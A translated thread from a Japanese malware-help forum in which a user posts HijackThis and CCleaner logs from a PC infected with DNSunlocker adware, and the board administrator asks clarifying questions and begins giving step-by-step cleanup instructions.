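悪代官の伏魔殿 Bulletin Board
DNSunlocker infection
Just the other day I got caught by DNSunlocker, and since then I have been seeing symptoms such as pop-ups appearing in Chrome and other browsers and clicks taking me to strange link destinations.

I have a fairly good idea of how I got infected: I think it was through using P2P. This incident has made me realize how naive I was, and I am resolved to delete the files and client in question and never use them again.

I would appreciate your help.

Below are the logs from HJT and CC.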


HJT
---------------------
Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 16:20:19, on 2015/09/06
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16659)

FIREFOX: 35.0.1 (x86 ja)
Boot mode: Normal

Running processes:
C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Program Files (x86)\Janetter2\bin\janettersrv.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Users\【ユーザー名】\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: DOwnnSave - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.dll (file missing)
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [LogMeIn Hamachi Ui] "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O4 - Startup: Dropbox.lnk = 【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CS2\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll
O18 - Protocol: cdl - {3DD53D40-7B8B-11D0-B013-00AA0059CE02} - C:\Windows\SysWOW64\urlmon.dll
O18 - Protocol: dvd - {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\Windows\SysWOW64\msvidctl.dll
O18 - Protocol hijack: file - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B}
O18 - Protocol hijack: ftp - {79EAC9E3-BAF9-11CE-8C82-00AA004BA90B}
O18 - Protocol hijack: http - {79EAC9E2-BAF9-11CE-8C82-00AA004BA90B}
O18 - Protocol: https - {79EAC9E5-BAF9-11CE-8C82-00AA004BA90B} - C:\Windows\SysWOW64\urlmon.dll
O18 - Protocol hijack: its - {9D148291-B9C8-11D0-A4CC-0000F80149F6}
O18 - Protocol: javascript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll
O18 - Protocol: local - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B} - C:\Windows\SysWOW64\urlmon.dll
O18 - Protocol: mailto - {3050F3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll
O18 - Protocol: mhtml - {05300401-BCBC-11D0-85E3-00C04FD85AB4} - C:\Windows\system32\inetcomm.dll
O18 - Protocol hijack: mk - {79EAC9E6-BAF9-11CE-8C82-00AA004BA90B}
O18 - Protocol: ms-its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\Windows\System32\itss.dll
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll
O18 - Protocol hijack: res - {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B}
O18 - Protocol hijack: tv - {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E}
O18 - Protocol: vbscript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll
O18 - Protocol: wlmailhtml - {03C514A3-1EFB-4856-9F99-10D7BE1653C0} - C:\Program Files (x86)\Windows Live\Mail\mailcomm.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Chrome リモート デスクトップ サービス (chromoting) - Google Inc. - C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DisplayLinkManager (DisplayLinkService) - DisplayLink Corp. - C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: @C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe,-100 (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - Riverbed Technology, Inc. - C:\Program Files (x86)\WinPcap\rpcapd.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 13265 bytes



cc
-------------------------
7-Zip 9.20 (x64 edition) Igor Pavlov 2014/04/02 4.53 MB 9.20.00.0
Acer Backup Manager NTI Corporation 2012/06/20 337 MB 3.0.0.100
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 2013/08/08 1.04.3507
Acer ScreenSaver Acer Incorporated 2013/08/08 20.11.1107.1418
Acer Updater Acer Incorporated 2012/06/20 1.02.3501
Adobe AIR Adobe Systems Incorporated 2014/04/23 13.0.0.83
Adobe Flash Player 18 ActiveX Adobe Systems Incorporated 2015/08/12 8.30 MB 18.0.0.232
Adobe Flash Player 18 NPAPI Adobe Systems Incorporated 2015/08/12 8.85 MB 18.0.0.232
Adobe Reader X (10.1.13) MUI Adobe Systems Incorporated 2014/12/13 482 MB 10.1.13
Amazon Kindle Amazon 2015/04/06
Apple Application Support(32 ビット) Apple Inc. 2015/04/18 94.2 MB 3.1.3
Apple Application Support(64 ビット) Apple Inc. 2015/04/18 107 MB 3.1.3
Apple Mobile Device Support Apple Inc. 2015/08/24 23.1 MB 8.1.1.3
Apple Software Update Apple Inc. 2014/04/07 2.38 MB 2.1.3.127
Audacity 2.0.6 Audacity Team 2014/10/18 47.2 MB 2.0.6
Bandicam Bandisoft.com 2015/08/18 29.8 MB 2.3.0.834
Bandisoft MPEG-1 Decoder Bandisoft.com 2015/08/18
Battlelog Web Plugins EA Digital Illusions CE AB 2015/02/04 2.6.2
Bonjour Apple Inc. 2014/06/04 2.00 MB 3.0.0.10
Borderlands 2 Gearbox Software 2015/03/06
Broadcom Card Reader Driver Installer Broadcom Corporation 2013/08/08 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 2013/08/08 5.100.82.120
CCleaner Piriform 2015/09/06 5.09
Chrome Remote Desktop Host Google Inc. 2015/09/03 18.0 MB 45.0.2454.17
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 166 MB 6.5.2727_43992
DisplayLink Core Software DisplayLink Corp. 2015/06/22 26.8 MB 7.8.63104.0
DisplayLink Graphics DisplayLink Corp. 2015/06/22 4.48 MB 7.8.63153.0
Dropbox Dropbox, Inc. 2015/09/04 3.8.8
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 2013/08/08 10.6.9.9
Explzh for Windows (64bit) pon software 2014/11/26 7.2.3.0
Fallout 3 - Game of the Year Edition Bethesda Game Studios 2015/06/22
Google Chrome Google Inc. 2015/09/03 45.0.2454.85
Google 日本語入力 Google Inc. 2015/09/03 87.1 MB 2.17.2267.0
Hangame 2015/06/10
Identity Card Acer Incorporated 2013/08/08 1.00.3501
Intel(R) Control Center Intel Corporation 2013/08/09 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 2013/08/09 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation 2013/08/08
Intel(R) Processor Graphics Intel Corporation 2013/08/09 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 2013/08/09 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2013/08/08 10.6 MB 1.23.605.1
iTunes Apple Inc. 2015/08/24 242 MB 12.1.2.27
Jane Style Version 3.83 Jane, Inc. 2015/04/06 3.83
Janetter 4.3.0.2 Jane, Inc. 2014/11/26
Java 8 Update 31 Oracle Corporation 2015/01/24 74.0 MB 8.0.310
Launch Manager Acer Inc. 2013/08/08 5.1.15
League of Legends Riot Games 2015/05/18 3.0.1
Left 4 Dead 2 Valve 2014/06/19
LEGO® Worlds TT Games 2015/06/22
LibraryModule Software Publisher 2014/03/18
LibreOffice 4.3.4.1 The Document Foundation 2014/12/09 469 MB 4.3.4.1
Logicool ゲーム ソフトウェア 8.57 Logicool 2015/04/06 110 MB 8.57.145
LogMeIn Hamachi LogMeIn, Inc. 2015/08/03 2.2.0.383
Microsoft .NET Framework 4.5.1 (日本語) Microsoft Corporation 2014/04/09 2.93 MB 4.5.50938
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/01/29 38.8 MB 4.5.51209
Microsoft Games for Windows - LIVE Redistributable Microsoft Corporation 2015/06/22 32.5 MB 2.0.672.0
Microsoft OneDrive Microsoft Corporation 2015/08/20 36.1 MB 17.3.5930.0814
Microsoft Security Essentials Microsoft Corporation 2015/05/18 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2015/05/18 150 MB 5.1.40416.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/06/20 300 KB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2013/08/08 708 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2013/08/08 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2014/04/08 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2015/03/06 1.41 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2013/08/08 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2014/04/08 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 15.2 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 12.2 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 Microsoft Corporation 2015/06/22 20.5 MB 11.0.61030.0
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 Microsoft Corporation 2015/06/22 17.3 MB 11.0.61030.0
Microsoft XNA Framework Redistributable 4.0 Microsoft Corporation 2014/08/05 8.03 MB 4.0.20823.0
Mozilla Firefox 35.0.1 (x86 ja) Mozilla 2015/02/17 82.9 MB 35.0.1
Mozilla Maintenance Service Mozilla 2015/02/17 214 KB 35.0.1
MyWinLocker Suite Egis Technology Inc. 2012/06/20 2.63 MB 4.0.14.19
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2013/08/08 0.96 GB 9.0.2.9006
Origin Electronic Arts, Inc. 2014/05/11 9.4.7.2799
Portal 2 Valve 2015/01/29
PunkBuster Services Even Balance, Inc. 2015/02/04 0.994
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2013/08/08 6.0.1.6543
RED BELT SKIN Series 2014/10/18
Skype(TM) 7.6 Skype Technologies S.A. 2015/08/07 73.2 MB 7.6.105
Starbound 2015/01/29
Starbound - Unstable 2015/06/22
Steam Valve Corporation 2014/04/23
TeamSpeak 3 Client TeamSpeak Systems GmbH 2015/02/22 3.0.16
Terraria Re-Logic 2014/08/05
The Walking Dead 2015/01/29
The Walking Dead: Season Two Telltale Games 2015/01/29
Unity Web Player Unity Technologies ApS 2014/05/12 12.0 MB
Vivaldi Vivaldi 2015/06/30 1.0.162.9
VLC media player 2.1.3 VideoLAN 2014/05/29 2.1.3
Welcome Center Acer Incorporated 2013/08/08 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
WinPcap 4.1.3 Riverbed Technology, Inc. 2014/04/08 4.1.0.2980
WinRAR 5.01 (64ビット) win.rar GmbH 2014/04/02 5.01.0
World of Warships Wargaming.net 2015/05/01 17.9 MB
XMedia Recode バージョン 3.1.9.0 XMedia Recode 2014/06/21 23.6 MB 3.1.9.0
らくらく無線スタートEX NEC AccessTechnica, Ltd. 2014/07/08
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2013/08/08 13.2 MB 2.5.1.0


  • あすとろ
  • 2015/09/06 (Sun) 16:41:56
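Two important things to confirm
Good evening.
I'm 悪代官, the administrator here.
Since I don't like being punished around 8:45 at night, I get punished by the pretty-girl squad around 8:45 on Sunday mornings instead.
♪ A small fry like this is no good (lol

I have looked at your explanation and logs.

>I have a fairly good idea of how I got infected: I think it was through using P2P. This incident has made me realize how naive I was, and I am resolved to delete the files and client in question and never use them again.

Yes, it is good that you told me honestly.
Please consider malware that infects via P2P to be far more troublesome than other malware.
Frankly, once you are infected via P2P, it could even be said that the only reliable remedy is a recovery (factory restore).

Even so, if you are prepared for the effort and intend to work toward a solution, I am willing to help as far as I can.
Refusing to give up gracefully is what an evil magistrate (悪代官) always does (wrong

But before I take on your case, I need to confirm some important things.

Do you currently have any McAfee application installed on the PC in question?
Traces of McAfee are visible, but it does not appear in the current installed-programs log.

And one more thing: do you use this PC for work at your workplace?

Please explain these two points.
I will consider how to proceed once I have heard your answers.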
  • 悪代官
  • 2015/09/06 (Sun) 21:14:26
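Re: DNSunlocker infection
Good evening.

I would like to resolve this without a recovery if possible, so I want to solve it even knowing that it may take time.

To answer your question: a McAfee application was installed after I bought the PC. I thought it was one of the usual free trials, but it was just something like an advertisement (?), and I judged that "it would only take up space", so I had uninstalled it.

As for the latter, I am a student, so I use this PC for my hobbies.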
  • あすとろ
  • 2015/09/06 (Sun) 22:36:51
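Now let's start the work
I have read your explanation.
So you are a student, あすとろ. In that case I can probably manage to help.

>a McAfee application was installed after I bought the PC. I thought it was one of the usual free trials, but it was just something like an advertisement (?), and I judged that "it would only take up space", so I had uninstalled it.

Yes, in that case it looks like "McAfee Security Scan Plus".
It is a simple tool capable only of detection, with no protection function, and is effectively meaningless as security software.
Even low-level malware can be blocked easily if proper protection is in place before infection, but once it gets in, removal is often terribly difficult.

Moreover, since you also told me you had been using P2P, in the worst case a recovery may be unavoidable, so please back up any data you need as your top priority.

Once you are ready, let's proceed carefully.

First, let me tell you this.
As you can see, there are currently many people seeking help, so each time it may take a day or more before I can reply to everyone in turn. I apologize and ask for your understanding.

Now please read the explanation below carefully and then carry out the work in order.
You have probably already prepared some of these, but please look over the explanation again just in case.

Set hidden files and file extensions to be shown (how to ↓)
http://pasofaq.jp/windows/mycomputer/hiddenfile.htm
http://support.microsoft.com/kb/978449/ja

Download the tools below and get to know their basic usage.
However, if the distribution sites show ads urging you to download other apps, never click on them.
"GeekUninstaller" (GU for short)
Description page ↓
http://www.gigafree.net/system/install/geekuninstaller.html
Download ↓
http://www.geekuninstaller.com/download
Click "download free", save the file, then extract it.
When you are finished with it, delete the whole folder manually.

"CCleaner" (CC for short)
Description ↓
http://www.gigafree.net/system/clean/ccleaner.html
http://note.chiebukuro.yahoo.co.jp/detail/n178757
Download ↓
http://www.piriform.com/ccleaner/download/standard
Download the latest version. During installation it may also offer bundled extra apps; uncheck those and avoid installing them.
When you are finished with it, uninstall it.

An important caution here.
CC is by nature a high-performance maintenance program, but if used incorrectly
【it can damage Windows】
so here we will use it only as an analysis tool.
Read the explanation carefully and do not perform any operation other than those I instruct.

Also, be sure to read the page below thoroughly before starting work, and if the need arises, deal with it as described there. Cases that require this are increasing.
http://note.chiebukuro.yahoo.co.jp/detail/n335704

Once you are ready, start the work.
In the work that follows, you may skip anything you cannot find after looking for it, but look carefully as you work so that you never touch anything other than what I have specified.

Also, I expect to instruct you to delete some things during the work; if any of them is something you installed yourself because you need it, hold off on deleting it and let me know in your next reply.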

>Platform: Windows 7 SP1 (WinNT 6.00.3505)
>MSIE: Internet Explorer v9.00 (9.00.8112.16659)
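The latest version of IE for Win7 is currently 11.
If you do not keep Windows updates (Windows Update) applied and current at all times, that alone can lead to a dangerous infection very quickly.

Also, at least the following applications are old versions.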
Adobe Reader X (10.1.13) MUI Adobe Systems Incorporated 2014/12/13 482 MB 10.1.13

Java 8 Update 31 Oracle Corporation 2015/01/24 74.0 MB 8.0.310

LibreOffice 4.3.4.1 The Document Foundation 2014/12/09 469 MB 4.3.4.1

Mozilla Firefox 35.0.1 (x86 ja) Mozilla 2015/02/17 82.9 MB 35.0.1

Skype(TM) 7.6 Skype Technologies S.A. 2015/08/07 73.2 MB 7.6.105

VLC media player 2.1.3 VideoLAN 2014/05/29 2.1.3

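Merely neglecting to update your applications is enough for vulnerabilities to be exploited and a serious infection to occur easily.
If you use them, update them to the latest version. If you do not use an application, uninstalling it is the safe choice.
Check whether there are any other old versions, and if there are, update or uninstall them in the same way.

At this point, manually create one restore point with "System Restore", a standard Windows feature.
This is because, in the work that follows, mistakenly touching something that is not a target can by itself cause serious problems in Windows, so this makes it possible to restore the system in an emergency.
http://windows.microsoft.com/ja-jp/windows7/create-a-restore-point

Next, start the PC in safe mode (how to ↓)
http://www.pc-master.jp/sousa/s-safemode.html

In safe mode, use GU to uninstall the following.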
Amazon Kindle Amazon 2015/04/06

Audacity 2.0.6 Audacity Team 2014/10/18 47.2 MB 2.0.6

Bandicam Bandisoft.com 2015/08/18 29.8 MB 2.3.0.834

Bandisoft MPEG-1 Decoder Bandisoft.com 2015/08/18

WinPcap 4.1.3 Riverbed Technology, Inc. 2014/04/08 4.1.0.2980

WinRAR 5.01 (64ビット) win.rar GmbH 2014/04/02 5.01.0

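Next, still in safe mode, start "Disk Cleanup" from "Accessories" → "System Tools" in the Start menu.
Once it starts, select drive C as the target drive and scan it; then check only the items "Downloaded Program Files", "Temporary Internet Files" and "Temporary files" among those shown, and press "OK" and then "Delete Files".
Running this cleans up the junk files in the selected areas.

Running this also reduces the useless junk files that scans detect during the work, which makes the time and the analysis considerably easier.
The reason for not checking other items such as "Recycle Bin" is to avoid deleting legitimate files by mistake, and so that a legitimate file that was deleted and put in the Recycle Bin can still be restored.

Start HJT and run a scan.
When the scan results are displayed, check the following items.
However, with HJT in particular a single mistake can easily leave the PC unable to boot, so never check anything other than what I have specified.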
O2 - BHO: DOwnnSave - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.dll (file missing)

O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe

O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe

O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - Riverbed Technology, Inc. - C:\Program Files (x86)\WinPcap\rpcapd.exe

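Once all the necessary items are checked, click Fix checked.
You may skip anything you cannot find after looking for it.

Now restart the PC in normal mode, and then start CC.
Once it starts, open "Tools" → "Startup" → the "Windows" tab.
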